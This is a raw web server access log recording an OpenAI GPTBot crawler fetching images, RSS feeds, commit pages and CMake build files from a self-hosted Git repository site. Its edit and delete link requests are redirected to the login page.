"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" +[17/Feb/2026:17:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 11068] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:17:40:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 11066] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:17:40:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 11069] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:17:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" +[17/Feb/2026:17:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36194] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36170] [Gzip 8.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:40:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom7.png" +[17/Feb/2026:17:40:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom7.png" +[17/Feb/2026:17:40:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:40:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:40:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:40:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:40:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:40:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:40:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:40:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:40:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:40:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:40:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:40:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:40:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:40:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:40:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:40:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom7.png" +[17/Feb/2026:17:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/ControlRoom7.png" +[17/Feb/2026:17:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:40:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom7.png" [Client 74.7.227.38] [Length 873] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom7.png" +[17/Feb/2026:17:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:40:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:40:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36196] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36195] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36196] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36196] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36194] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/Project%20Planning-1.md" +[17/Feb/2026:17:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:17:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11841] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:41:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:41:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:17:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11304] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:17:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:17:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr 